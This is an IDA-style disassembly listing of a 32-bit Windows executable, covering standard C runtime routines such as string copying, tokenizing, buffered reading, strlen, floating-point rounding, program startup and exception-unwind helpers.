loc_403D1E:				; CODE XREF: sub_403CD0+ADj
		and	ebx, 3
		jz	short loc_403D36

loc_403D23:				; CODE XREF: sub_403CD0+2Aj
					; sub_403CD0+64j
		mov	al, [esi]
		add	esi, 1
		mov	[edi], al
		add	edi, 1
		test	al, al
		jz	short loc_403D68
		sub	ebx, 1
		jnz	short loc_403D23

loc_403D36:				; CODE XREF: sub_403CD0+39j
					; sub_403CD0+51j
		mov	eax, [esp+0Ch+arg_0]
		pop	ebx
		pop	esi
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403D3E:				; CODE XREF: sub_403CD0+3Dj
		test	edi, 3
		jz	short loc_403D5C

loc_403D46:				; CODE XREF: sub_403CD0+8Aj
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jz	loc_403DEC
		test	edi, 3
		jnz	short loc_403D46

loc_403D5C:				; CODE XREF: sub_403CD0+74j
		mov	ebx, ecx
		shr	ecx, 2
		jnz	short loc_403DD7

loc_403D63:				; CODE XREF: sub_403CD0+9Bj
					; sub_403CD0+116j
		mov	[edi], al
		add	edi, 1

loc_403D68:				; CODE XREF: sub_403CD0+5Fj
		sub	ebx, 1
		jnz	short loc_403D63
		pop	ebx
		pop	esi

loc_403D6F:				; CODE XREF: sub_403CD0+7j
		mov	eax, [esp+4+arg_0]
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403D75:				; CODE XREF: sub_403CD0+C7j
					; sub_403CD0+DFj
		mov	[edi], edx
		add	edi, 4
		sub	ecx, 1
		jz	short loc_403D1E

loc_403D7F:				; CODE XREF: sub_403CD0+24j
					; sub_403CD0+4Cj
		mov	edx, 7EFEFEFFh
		mov	eax, [esi]
		add	edx, eax
		xor	eax, 0FFFFFFFFh
		xor	eax, edx
		mov	edx, [esi]
		add	esi, 4
		test	eax, 81010100h
		jz	short loc_403D75
		test	dl, dl
		jz	short loc_403DC9
		test	dh, dh
		jz	short loc_403DBF
		test	edx, 0FF0000h
		jz	short loc_403DB5
		test	edx, 0FF000000h
		jnz	short loc_403D75
		mov	[edi], edx
		jmp	short loc_403DCD
; ---------------------------------------------------------------------------

loc_403DB5:				; CODE XREF: sub_403CD0+D7j
		and	edx, 0FFFFh
		mov	[edi], edx
		jmp	short loc_403DCD
; ---------------------------------------------------------------------------

loc_403DBF:				; CODE XREF: sub_403CD0+CFj
		and	edx, 0FFh
		mov	[edi], edx
		jmp	short loc_403DCD
; ---------------------------------------------------------------------------

loc_403DC9:				; CODE XREF: sub_403CD0+CBj
		xor	edx, edx
		mov	[edi], edx

loc_403DCD:				; CODE XREF: sub_403CD0+E3j
					; sub_403CD0+EDj ...
		add	edi, 4
		xor	eax, eax
		sub	ecx, 1
		jz	short loc_403DE3

loc_403DD7:				; CODE XREF: sub_403CD0+91j
		xor	eax, eax

loc_403DD9:				; CODE XREF: sub_403CD0+111j
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 1
		jnz	short loc_403DD9

loc_403DE3:				; CODE XREF: sub_403CD0+105j
		and	ebx, 3
		jnz	loc_403D63

loc_403DEC:				; CODE XREF: sub_403CD0+7Ej
		mov	eax, [esp+0Ch+arg_0]
		pop	ebx
		pop	esi
		pop	edi
		retn
sub_403CD0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403DF4	proc near		; CODE XREF: sub_417E66+1Dp
					; sub_417E66+5Ap ...

var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= byte ptr -24h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		mov	[ebp+var_2C], eax
		call	sub_40574D
		push	8
		pop	ecx
		mov	[ebp+var_28], eax
		xor	eax, eax
		lea	edi, [ebp+var_24]
		push	7
		rep stosd
		pop	edi

loc_403E25:				; CODE XREF: sub_403DF4+4Aj
		mov	dl, [esi]
		movzx	ecx, dl
		mov	eax, ecx
		and	ecx, edi
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+var_24]
		or	[eax], bl
		inc	esi
		test	dl, dl
		jnz	short loc_403E25
		mov	edx, [ebp+var_2C]
		test	edx, edx
		jnz	short loc_403E54
		mov	eax, [ebp+var_28]
		mov	edx, [eax+18h]
		jmp	short loc_403E54
; ---------------------------------------------------------------------------

loc_403E4F:				; CODE XREF: sub_403DF4+77j
		test	al, al
		jz	short loc_403E6D
		inc	edx

loc_403E54:				; CODE XREF: sub_403DF4+51j
					; sub_403DF4+59j
		mov	al, [edx]
		movzx	esi, al
		xor	ebx, ebx
		mov	ecx, esi
		and	ecx, edi
		inc	ebx
		shl	ebx, cl
		shr	esi, 3
		mov	cl, [ebp+esi+var_24]
		test	bl, cl
		jnz	short loc_403E4F

loc_403E6D:				; CODE XREF: sub_403DF4+5Dj
		mov	ebx, edx
		jmp	short loc_403E89
; ---------------------------------------------------------------------------

loc_403E71:				; CODE XREF: sub_403DF4+98j
		movzx	esi, byte ptr [edx]
		xor	eax, eax
		mov	ecx, esi
		and	ecx, edi
		inc	eax
		shl	eax, cl
		shr	esi, 3
		mov	cl, [ebp+esi+var_24]
		test	al, cl
		jnz	short loc_403E90
		inc	edx

loc_403E89:				; CODE XREF: sub_403DF4+7Bj
		cmp	byte ptr [edx],	0
		jnz	short loc_403E71
		jmp	short loc_403E94
; ---------------------------------------------------------------------------

loc_403E90:				; CODE XREF: sub_403DF4+92j
		mov	byte ptr [edx],	0
		inc	edx

loc_403E94:				; CODE XREF: sub_403DF4+9Aj
		mov	eax, [ebp+var_28]
		mov	ecx, [ebp+var_4]
		mov	[eax+18h], edx
		mov	eax, ebx
		sub	eax, edx
		neg	eax
		sbb	eax, eax
		pop	edi
		and	eax, ebx
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_403DF4	endp


; =============== S U B	R O U T	I N E =======================================



sub_403EB3	proc near		; CODE XREF: sub_41B981+70p
					; sub_41B981+160p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_403EDA
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_403EDA:				; CODE XREF: sub_403EB3+9j
		mov	eax, [eax+0Ch]
		and	eax, 10h
		pop	esi
		retn
sub_403EB3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403EE2	proc near		; CODE XREF: sub_404078+A1p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_8]
		test	edi, edi
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_4], eax
		jz	loc_404032
		cmp	[ebp+arg_C], 0
		jz	loc_404032
		imul	edi, [ebp+arg_C]
		mov	esi, [ebp+arg_10]
		test	word ptr [esi+0Ch], 10Ch
		mov	[ebp+var_10], edi
		mov	ebx, edi
		jz	short loc_403F28
		mov	eax, [esi+18h]
		mov	[ebp+var_C], eax
		jmp	short loc_403F2F
; ---------------------------------------------------------------------------

loc_403F28:				; CODE XREF: sub_403EE2+3Cj
		mov	[ebp+var_C], 1000h

loc_403F2F:				; CODE XREF: sub_403EE2+44j
		test	edi, edi
		jz	loc_403FFE

loc_403F37:				; CODE XREF: sub_403EE2+116j
		test	word ptr [esi+0Ch], 10Ch
		jz	short loc_403F80
		mov	eax, [esi+4]
		test	eax, eax
		jz	short loc_403F80
		jl	loc_404063
		cmp	ebx, eax
		mov	edi, ebx
		jb	short loc_403F54
		mov	edi, eax

loc_403F54:				; CODE XREF: sub_403EE2+6Ej
		cmp	edi, [ebp+var_4]
		ja	loc_404003
		push	edi
		push	dword ptr [esi]
		push	[ebp+var_4]
		push	[ebp+var_8]
		call	sub_403332
		sub	[esi+4], edi
		add	[esi], edi
		add	[ebp+var_8], edi
		sub	ebx, edi
		add	esp, 10h
		sub	[ebp+var_4], edi
		mov	edi, [ebp+var_10]
		jmp	short loc_403FF6
; ---------------------------------------------------------------------------

loc_403F80:				; CODE XREF: sub_403EE2+5Bj
					; sub_403EE2+62j
		cmp	ebx, [ebp+var_C]
		jb	short loc_403FCE
		cmp	[ebp+var_C], 0
		mov	eax, ebx
		jz	short loc_403F96
		xor	edx, edx
		div	[ebp+var_C]
		mov	eax, ebx
		sub	eax, edx

loc_403F96:				; CODE XREF: sub_403EE2+A9j
		cmp	eax, [ebp+var_4]
		ja	loc_404039
		push	eax
		push	[ebp+var_8]
		push	esi
		call	sub_408DD0
		pop	ecx
		push	eax
		call	sub_40A6FF
		add	esp, 0Ch
		test	eax, eax
		jz	loc_404072
		cmp	eax, 0FFFFFFFFh
		jz	loc_404063
		add	[ebp+var_8], eax
		sub	ebx, eax
		sub	[ebp+var_4], eax
		jmp	short loc_403FF6
; ---------------------------------------------------------------------------

loc_403FCE:				; CODE XREF: sub_403EE2+A1j
		push	esi
		call	sub_40A03D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	loc_404067
		cmp	[ebp+var_4], 0
		jz	short loc_404039
		mov	ecx, [ebp+var_8]
		inc	[ebp+var_8]
		mov	[ecx], al
		mov	eax, [esi+18h]
		dec	ebx
		dec	[ebp+var_4]
		mov	[ebp+var_C], eax

loc_403FF6:				; CODE XREF: sub_403EE2+9Cj
					; sub_403EE2+EAj
		test	ebx, ebx
		jnz	loc_403F37

loc_403FFE:				; CODE XREF: sub_403EE2+4Fj
		mov	eax, [ebp+arg_C]
		jmp	short loc_404034
; ---------------------------------------------------------------------------

loc_404003:				; CODE XREF: sub_403EE2+75j
		xor	esi, esi
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_40401A
		push	[ebp+arg_4]
		push	esi
		push	[ebp+arg_0]
		call	sub_407F20
		add	esp, 0Ch

loc_40401A:				; CODE XREF: sub_403EE2+127j
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 22h
		push	esi

loc_40402A:				; CODE XREF: sub_403EE2+17Fj
		call	sub_4032F9
		add	esp, 14h

loc_404032:				; CODE XREF: sub_403EE2+1Aj
					; sub_403EE2+24j
		xor	eax, eax

loc_404034:				; CODE XREF: sub_403EE2+11Fj
					; sub_403EE2+18Ej
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_404039:				; CODE XREF: sub_403EE2+B7j
					; sub_403EE2+100j
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_40404F
		push	[ebp+arg_4]
		push	0
		push	[ebp+arg_0]
		call	sub_407F20
		add	esp, 0Ch

loc_40404F:				; CODE XREF: sub_403EE2+15Bj
		call	sub_405B83
		mov	dword ptr [eax], 22h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		jmp	short loc_40402A
; ---------------------------------------------------------------------------

loc_404063:				; CODE XREF: sub_403EE2+64j
					; sub_403EE2+DCj
		or	dword ptr [esi+0Ch], 20h

loc_404067:				; CODE XREF: sub_403EE2+F6j
					; sub_403EE2+194j
		mov	eax, edi
		sub	eax, ebx
		xor	edx, edx
		div	[ebp+arg_8]
		jmp	short loc_404034
; ---------------------------------------------------------------------------

loc_404072:				; CODE XREF: sub_403EE2+D3j
		or	dword ptr [esi+0Ch], 10h
		jmp	short loc_404067
sub_403EE2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404078	proc near		; CODE XREF: sub_40413F+12p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	0Ch
		push	offset dword_4216F8
		call	__SEH_prolog4
		xor	esi, esi
		mov	[ebp+var_1C], esi
		mov	ebx, [ebp+arg_8]
		cmp	ebx, esi
		jz	short loc_4040BB
		mov	edi, [ebp+arg_C]
		cmp	edi, esi
		jz	short loc_4040BB
		xor	eax, eax
		cmp	[ebp+arg_0], esi
		setnz	al
		cmp	eax, esi
		jnz	short loc_4040C3

loc_4040A3:				; CODE XREF: sub_404078+7Aj
					; sub_404078+88j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4032F9
		add	esp, 14h

loc_4040BB:				; CODE XREF: sub_404078+16j
					; sub_404078+1Dj
		xor	eax, eax

loc_4040BD:				; CODE XREF: sub_404078+BBj
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4040C3:				; CODE XREF: sub_404078+29j
		cmp	[ebp+arg_10], esi
		jz	short loc_4040D3
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ebx
		cmp	edi, eax
		jbe	short loc_404102

loc_4040D3:				; CODE XREF: sub_404078+4Ej
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_4040E8
		push	[ebp+arg_4]
		push	esi
		push	[ebp+arg_0]
		call	sub_407F20
		add	esp, 0Ch

loc_4040E8:				; CODE XREF: sub_404078+5Fj
		xor	eax, eax
		cmp	[ebp+arg_10], esi
		setnz	al
		cmp	eax, esi
		jz	short loc_4040A3
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ebx
		cmp	eax, edi
		sbb	eax, eax
		inc	eax
		jz	short loc_4040A3

loc_404102:				; CODE XREF: sub_404078+59j
		push	[ebp+arg_10]
		call	sub_40850B
		pop	ecx
		mov	[ebp+ms_exc.disabled], esi
		push	[ebp+arg_10]
		push	edi
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_403EE2
		add	esp, 14h
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_404135
		mov	eax, [ebp+var_1C]
		jmp	short loc_4040BD
sub_404078	endp


; =============== S U B	R O U T	I N E =======================================



sub_404135	proc near		; CODE XREF: sub_404078+B3p
					; DATA XREF: _1fieagrn:00421710o
		push	dword ptr [ebp+18h]
		call	sub_40855D
		pop	ecx
		retn
sub_404135	endp


; =============== S U B	R O U T	I N E =======================================



sub_40413F	proc near		; CODE XREF: sub_41B981+D6p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	[esp+arg_C]
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	0FFFFFFFFh
		push	[esp+10h+arg_0]
		call	sub_404078
		add	esp, 14h
		retn
sub_40413F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40415A	proc near		; CODE XREF: sub_40416Bj
					; sub_410661+35p

arg_0		= dword	ptr  4

		push	0Ah
		push	0
		push	[esp+8+arg_0]
		call	sub_40AA06
		add	esp, 0Ch
		retn
sub_40415A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_40416B	proc near		; CODE XREF: sub_401E4A+9Dp
					; sub_401E4A+ACp ...
		jmp	sub_40415A
sub_40416B	endp


; =============== S U B	R O U T	I N E =======================================



sub_404170	proc near		; CODE XREF: sub_41AFA7+586p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= qword	ptr  4

		cmp	dword_4352DC, 0
		jz	sub_40ACF3
		sub	esp, 8
		stmxcsr	[esp+8+var_4]
		mov	eax, [esp+8+var_4]
		and	eax, 1F80h
		cmp	eax, 1F80h
		jnz	short loc_4041A4
		fnstcw	word ptr [esp+8+var_8]
		mov	ax, word ptr [esp+8+var_8]
		and	ax, 7Fh
		cmp	ax, 7Fh

loc_4041A4:				; CODE XREF: sub_404170+23j
		lea	esp, [esp+8]
		jnz	sub_40ACF3
		jmp	short $+2
		movq	xmm0, [esp+arg_0]
		movapd	xmm2, oword ptr	ds:oword_41D3B0
		movapd	xmm1, xmm0
		movapd	xmm7, xmm0
		psrlq	xmm0, 34h
		movd	eax, xmm0
		andpd	xmm0, oword ptr	ds:oword_41D3D0
		psubd	xmm2, xmm0
		psrlq	xmm1, xmm2
		test	eax, 800h
		jz	short loc_404232
		cmp	eax, 0BFFh
		jl	short loc_40426A
		psllq	xmm1, xmm2
		cmp	eax, 0C32h
		jg	short loc_404203
		movq	[esp+arg_0], xmm1
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_404203:				; CODE XREF: sub_404170+86j
					; sub_404170+E1j
		ucomisd	xmm7, xmm7
		jnp	short loc_40422D
		mov	edx, 3ECh
		sub	esp, 10h
		mov	[esp+10h+var_4], edx
		mov	edx, esp
		add	edx, 14h
		mov	[esp+10h+var_8], edx
		mov	[esp+10h+var_C], edx
		mov	[esp+10h+var_10], edx
		call	sub_40AA2F
		add	esp, 10h

loc_40422D:				; CODE XREF: sub_404170+97j
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_404232:				; CODE XREF: sub_404170+74j
		movq	xmm0, [esp+arg_0]
		psllq	xmm1, xmm2
		movapd	xmm3, xmm0
		cmppd	xmm0, xmm1, 6
		cmp	eax, 3FFh
		jl	short loc_404271
		cmp	eax, 432h
		jg	short loc_404203
		andpd	xmm0, oword ptr	ds:oword_41D3A0
		addsd	xmm1, xmm0
		movq	[esp+arg_0], xmm1
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_40426A:				; CODE XREF: sub_404170+7Bj
		fld	ds:dbl_41D3E0
		retn
; ---------------------------------------------------------------------------

loc_404271:				; CODE XREF: sub_404170+DAj
		cmppd	xmm3, oword ptr	ds:oword_41D3C0, 6
		andpd	xmm3, oword ptr	ds:oword_41D3A0
		movq	[esp+arg_0], xmm3
		fld	[esp+arg_0]
		retn
sub_404170	endp


; =============== S U B	R O U T	I N E =======================================



sub_40428D	proc near		; CODE XREF: sub_4044D2-1A0p
					; sub_4044D2-103p ...

arg_0		= dword	ptr  4

		cmp	dword_4270DC, 1
		jnz	short loc_40429B
		call	sub_40A004

loc_40429B:				; CODE XREF: sub_40428D+7j
		push	[esp+arg_0]
		call	sub_409E64
		push	0FFh
		call	sub_407C57
		pop	ecx
		pop	ecx
		retn
sub_40428D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4042B1	proc near		; CODE XREF: sub_4044D2-11Bp
		cmp	word ptr ds:400000h, 5A4Dh
		jnz	short loc_4042EF
		mov	eax, ds:40003Ch
		cmp	dword ptr [eax+400000h], 4550h
		jnz	short loc_4042EF
		cmp	word ptr [eax+400018h],	10Bh
		jnz	short loc_4042EF
		cmp	dword ptr [eax+400074h], 0Eh
		jbe	short loc_4042EF
		xor	ecx, ecx
		cmp	[eax+4000E8h], ecx
		setnz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_4042EF:				; CODE XREF: sub_4042B1+9j
					; sub_4042B1+1Aj ...
		xor	eax, eax
		retn
sub_4042B1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4044D2

loc_4042F2:				; CODE XREF: sub_4044D2+5j
		push	60h
		push	offset dword_421718
		call	__SEH_prolog4
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-70h]
		push	eax
		call	ds:off_41D1A8
		mov	dword ptr [ebp-4], 0FFFFFFFEh
		mov	edi, 94h
		push	edi
		push	0
		mov	ebx, ds:dword_41D0FC
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41D110	; RtlAllocateHeap
		mov	esi, eax
		test	esi, esi
		jnz	short loc_40433D
		push	12h
		call	sub_40428D
		pop	ecx
		jmp	loc_4044C7
; ---------------------------------------------------------------------------

loc_40433D:				; CODE XREF: sub_4044D2-1A4j
		mov	[esi], edi
		push	esi
		call	ds:dword_41D068	; GetVersionExA
		push	esi
		push	0
		test	eax, eax
		jnz	short loc_40435B
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41D108	; RtlFreeHeap
		jmp	loc_4044C7
; ---------------------------------------------------------------------------

loc_40435B:				; CODE XREF: sub_4044D2-187j
		mov	eax, [esi+10h]
		mov	[ebp-20h], eax
		mov	eax, [esi+4]
		mov	[ebp-24h], eax
		mov	eax, [esi+8]
		mov	[ebp-28h], eax
		mov	edi, [esi+0Ch]
		and	edi, 7FFFh
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41D108	; RtlFreeHeap
		mov	esi, [ebp-20h]
		cmp	esi, 2
		jz	short loc_40438D
		or	edi, 8000h

loc_40438D:				; CODE XREF: sub_4044D2-14Dj
		mov	ecx, [ebp-24h]
		mov	eax, ecx
		shl	eax, 8
		mov	edx, [ebp-28h]
		add	eax, edx
		mov	dword_4275B8, esi
		mov	dword_4275C0, eax
		mov	dword_4275C4, ecx
		mov	dword_4275C8, edx
		mov	dword_4275BC, edi
		call	sub_4042B1
		mov	[ebp-20h], eax
		xor	ebx, ebx
		inc	ebx
		push	ebx
		call	sub_405E33
		pop	ecx
		test	eax, eax
		jnz	short loc_4043D5
		push	1Ch
		call	sub_40428D
		pop	ecx

loc_4043D5:				; CODE XREF: sub_4044D2-107j
		call	sub_405886
		test	eax, eax
		jnz	short loc_4043E6
		push	10h
		call	sub_40428D
		pop	ecx

loc_4043E6:				; CODE XREF: sub_4044D2-F6j
		call	sub_40B3F1
		mov	[ebp-4], ebx
		call	sub_408B90
		test	eax, eax
		jge	short loc_4043FF
		push	1Bh
		call	sub_407C0D
		pop	ecx

loc_4043FF:				; CODE XREF: sub_4044D2-DDj
		call	ds:off_41D1A4
		mov	dword_436458, eax
		call	sub_40B2BC
		mov	dword_4270D4, eax
		call	sub_40B203
		test	eax, eax
		jge	short loc_404425
		push	8
		call	sub_407C0D
		pop	ecx

loc_404425:				; CODE XREF: sub_4044D2-B7j
		call	sub_40AF90
		test	eax, eax
		jge	short loc_404436
		push	9
		call	sub_407C0D
		pop	ecx

loc_404436:				; CODE XREF: sub_4044D2-A6j
		push	ebx
		call	sub_407D29
		pop	ecx
		test	eax, eax
		jz	short loc_404448
		push	eax
		call	sub_407C0D
		pop	ecx

loc_404448:				; CODE XREF: sub_4044D2-93j
		call	sub_40AF33
		test	[ebp-44h], bl
		jz	short loc_404458
		movzx	ecx, word ptr [ebp-40h]
		jmp	short loc_40445B
; ---------------------------------------------------------------------------

loc_404458:				; CODE XREF: sub_4044D2-82j
		push	0Ah
		pop	ecx

loc_40445B:				; CODE XREF: sub_4044D2-7Cj
		push	ecx
		push	eax
		push	0
		push	400000h
		call	sub_41C28D
		mov	[ebp-1Ch], eax
		cmp	dword ptr [ebp-20h], 0
		jnz	short loc_404478
		push	eax
		call	sub_407E89

loc_404478:				; CODE XREF: sub_4044D2-62j
		call	sub_407EAB
		jmp	short loc_4044AD
; END OF FUNCTION CHUNK	FOR sub_4044D2
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-2Ch], ecx
		push	eax
		push	ecx
		call	sub_40ADC4
		pop	ecx
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	eax, [ebp-2Ch]
		mov	[ebp-1Ch], eax
		cmp	dword ptr [ebp-20h], 0
		jnz	short loc_4044A8
		push	eax
		call	sub_407E9A

loc_4044A8:				; CODE XREF: .text:004044A0j
		call	sub_407EBA
; START	OF FUNCTION CHUNK FOR sub_4044D2

loc_4044AD:				; CODE XREF: sub_4044D2-55j
		mov	dword ptr [ebp-4], 0FFFFFFFEh
		mov	eax, [ebp-1Ch]
		jmp	short loc_4044CC
; END OF FUNCTION CHUNK	FOR sub_4044D2
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	dword ptr [ebp-4], 0FFFFFFFEh
; START	OF FUNCTION CHUNK FOR sub_4044D2

loc_4044C7:				; CODE XREF: sub_4044D2-19Aj
					; sub_4044D2-17Cj
		mov	eax, 0FFh

loc_4044CC:				; CODE XREF: sub_4044D2-1Bj
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_4044D2

; =============== S U B	R O U T	I N E =======================================



sub_4044D2	proc near		; CODE XREF: sub_451E4Ej

; FUNCTION CHUNK AT 004042F2 SIZE 0000018D BYTES
; FUNCTION CHUNK AT 004044AD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004044C7 SIZE 0000000B BYTES

		call	sub_40B439
		jmp	loc_4042F2
sub_4044D2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4044E0	proc near		; CODE XREF: sub_402FCC+16p
					; sub_403032+21p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		test	ecx, 3
		jz	short loc_404510

loc_4044EC:				; CODE XREF: sub_4044E0+1Bj
		mov	al, [ecx]
		add	ecx, 1
		test	al, al
		jz	short loc_404543
		test	ecx, 3
		jnz	short loc_4044EC
		add	eax, 0
		lea	esp, [esp+0]
		lea	esp, [esp+0]

loc_404510:				; CODE XREF: sub_4044E0+Aj
					; sub_4044E0+46j ...
		mov	eax, [ecx]
		mov	edx, 7EFEFEFFh
		add	edx, eax
		xor	eax, 0FFFFFFFFh
		xor	eax, edx
		add	ecx, 4
		test	eax, 81010100h
		jz	short loc_404510
		mov	eax, [ecx-4]
		test	al, al
		jz	short loc_404561
		test	ah, ah
		jz	short loc_404557
		test	eax, 0FF0000h
		jz	short loc_40454D
		test	eax, 0FF000000h
		jz	short loc_404543
		jmp	short loc_404510
; ---------------------------------------------------------------------------

loc_404543:				; CODE XREF: sub_4044E0+13j
					; sub_4044E0+5Fj
		lea	eax, [ecx-1]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_40454D:				; CODE XREF: sub_4044E0+58j
		lea	eax, [ecx-2]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_404557:				; CODE XREF: sub_4044E0+51j
		lea	eax, [ecx-3]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_404561:				; CODE XREF: sub_4044E0+4Dj
		lea	eax, [ecx-4]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
sub_4044E0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40456B	proc near		; CODE XREF: sub_40121E+58p
					; sub_40150F+Fp ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, [ebp+arg_0]
		push	esi
		push	edi
		push	8
		pop	ecx
		mov	esi, offset dword_41D3E8
		lea	edi, [ebp+var_20]
		rep movsd
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_4]
		test	eax, eax
		pop	edi
		mov	[ebp+var_4], eax
		pop	esi
		jz	short loc_40459E
		test	byte ptr [eax],	8
		jz	short loc_40459E
		mov	[ebp+var_C], 1994000h

loc_40459E:				; CODE XREF: sub_40456B+25j
					; sub_40456B+2Aj
		lea	eax, [ebp+var_C]
		push	eax
		push	[ebp+var_10]
		push	[ebp+var_1C]
		push	[ebp+var_20]
		call	ds:off_41D1AC
		leave
		retn	8
sub_40456B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4045B5	proc near		; CODE XREF: sub_40BC58+65p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		mov	eax, [ebp+arg_4]
		add	eax, 0Ch
		mov	[ebp+var_4], eax
		mov	ebx, large fs:0
		mov	eax, [ebx]
		mov	large fs:0, eax
		mov	eax, [ebp+arg_0]
		mov	ebx, [ebp+arg_4]
		mov	ebp, [ebp+var_4]
		mov	esp, [ebx-4]
		jmp	eax
sub_4045B5	endp

; ---------------------------------------------------------------------------
		pop	ebx
		leave
		retn	8

; =============== S U B	R O U T	I N E =======================================



sub_4045E5	proc near		; CODE XREF: sub_40B771+31p
					; sub_40BBC7+59p ...

arg_4		= dword	ptr  8

		pop	eax
		pop	ecx
		xchg	eax, [esp-8+arg_4]
		jmp	eax
sub_4045E5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4045EC	proc near		; CODE XREF: sub_404779+69p
					; sub_40BC58:loc_40BC80p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		mov	esi, large fs:0
		mov	[ebp+var_4], esi
		mov	[ebp+var_8], offset loc_404615
		push	0
		push	[ebp+arg_4]
